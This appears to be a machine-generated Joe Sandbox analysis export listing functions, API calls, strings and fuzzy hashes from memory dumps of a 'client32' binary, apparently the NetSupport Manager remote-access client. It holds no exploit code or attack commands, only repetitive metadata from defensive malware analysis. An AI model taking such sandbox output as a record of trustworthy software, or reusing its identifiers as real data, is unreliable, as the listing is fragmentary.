Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
ExtractIconExA.SHELL32(?,00000000,006401D3,001E01B3,00000001), ref: 11145068

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741

Uniqueness

Uniqueness Score: -1.00%

Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

__lock_file.LIBCMT ref: 11164CBE

Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E

__fclose_nolock.LIBCMT ref: 11164CC9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46

Uniqueness

Uniqueness Score: -1.00%

Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010B94

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 674591a9cf5b99c6b76fadc49bf5f19c5d73d91f2c58c24d8327e4ef389a798e
Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
Opcode Fuzzy Hash: 674591a9cf5b99c6b76fadc49bf5f19c5d73d91f2c58c24d8327e4ef389a798e
Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,775EC740,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754

Uniqueness

Uniqueness Score: -1.00%

Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780

Uniqueness

Uniqueness Score: -1.00%

Function 1105E820 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 1105E85D

Part of subcall function 1116450B: strtoxl.LIBCMT ref: 1116452C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __wcstoi64strtoxl
String ID:
API String ID: 910016052-0
Opcode ID: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
Instruction ID: 23ac52cab648964c8bc4f85844fc967f5549f4a308fdde8bda903d18a29afeb2
Opcode Fuzzy Hash: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
Instruction Fuzzy Hash: 5F014F36A0010DABC710DFA8C941FAFB7B8DF99704F114059AD45AB280DAB1AE14D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11164EBA

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585

Uniqueness

Uniqueness Score: -1.00%

Function 00211000 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00211000(intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t3;

				_t3 = _a16;
				_push(_t3);
				_push(_a12); // executed
				L002110AA(); // executed
				return _t3;
			}

0x00211003
0x00211009
0x0021100a
0x0021100b
0x00211011

APIs

_NSMClient32@8.PCICL32(?,?,?,002110A2,00000000), ref: 0021100B

Memory Dump Source

Source File: 00000012.00000002.1074256744.0000000000211000.00000020.00000001.01000000.00000008.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1074249169.0000000000210000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1074264589.0000000000212000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction ID: 2076dc49dfc28d8eeb480a48400b292d53affbfe8b9f93df8d3f15943a4e97af
Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction Fuzzy Hash: 89B092B252434D9B8714EE98E841CBB33DCAAA8600B000809BE0543282CA71FCB09A71

Uniqueness

Uniqueness Score: -1.00%

Function 1116C488 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 110CB7D9
IsIconic.USER32 ref: 110CB7E9
GetClientRect.USER32 ref: 110CB7F8
GetSystemMetrics.USER32 ref: 110CB80D
GetSystemMetrics.USER32 ref: 110CB814
IsIconic.USER32 ref: 110CB844
GetWindowRect.USER32 ref: 110CB853
SetWindowPos.USER32(?,00000000,11186ABB,000000FF,00000000,00000000,0000001D,00000000,?,00000001,11186ABB,00000002), ref: 110CB907

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110CB7C4, 110CB8EC
..\ctl32\nsmdlg.cpp, xrefs: 110CB799
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CB7BF, 110CB8E7
m_eh, xrefs: 110CB79E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
API String ID: 2655531791-1552842965
Opcode ID: a366ab5410dea8e8c04fb98377053f1f5cda35db3b9c15707a6c6aadd4763636
Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
Opcode Fuzzy Hash: a366ab5410dea8e8c04fb98377053f1f5cda35db3b9c15707a6c6aadd4763636
Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 11114590 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93keyboardsleepwindowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 111145D5

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetKeyState.USER32(00000090), ref: 11114600

Part of subcall function 11113190: DeviceIoControl.KERNEL32 ref: 111131E2
Part of subcall function 11113190: keybd_event.USER32 ref: 11113215

GetKeyState.USER32(00000014), ref: 1111464C
Sleep.KERNEL32(00000064), ref: 1111466E
GetKeyState.USER32(00000091), ref: 111146A4

Strings

DisableSyncCapsLock, xrefs: 11114637
DisableSyncScrollLock, xrefs: 1111468C
DisableSyncNumLock, xrefs: 111145E2
View, xrefs: 111145E7, 1111463C, 11114691

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: State$ControlDeviceMessagePeekSleep__wcstoi64keybd_event
String ID: DisableSyncCapsLock$DisableSyncNumLock$DisableSyncScrollLock$View
API String ID: 1459313812-451981794
Opcode ID: 9b8c6deadc08ce571a03270d49f65b42d5b797602dbbdae65745d4e75f45d9da
Instruction ID: 124f8e62a6da658c60687918a6121e4bc492e5a03fd0ed5725fd2557b003e167
Opcode Fuzzy Hash: 9b8c6deadc08ce571a03270d49f65b42d5b797602dbbdae65745d4e75f45d9da
Instruction Fuzzy Hash: 6131D93478074297E320DB34CD45B9AF7E5AB4470CF004829E79A5E6C9EB79B940C79A

Uniqueness

Uniqueness Score: -1.00%

Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
FindWindowA.USER32 ref: 110934EA
SetForegroundWindow.USER32(00000000), ref: 110934F1

Part of subcall function 11091920: GlobalAddAtomA.KERNEL32 ref: 11091982

Part of subcall function 11093410: GetClassInfoA.USER32 ref: 11093424

Part of subcall function 11091A50: CreateWindowExA.USER32 ref: 11091A9D
Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF

CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531

Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B1A
Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
Part of subcall function 11091B00: DispatchMessageA.USER32 ref: 11091B5B
Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B6B

CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555

Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32 ref: 110919FE

Strings

NSMFindClassEvent, xrefs: 110934CD, 11093526
NSMClassList, xrefs: 110934E5

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
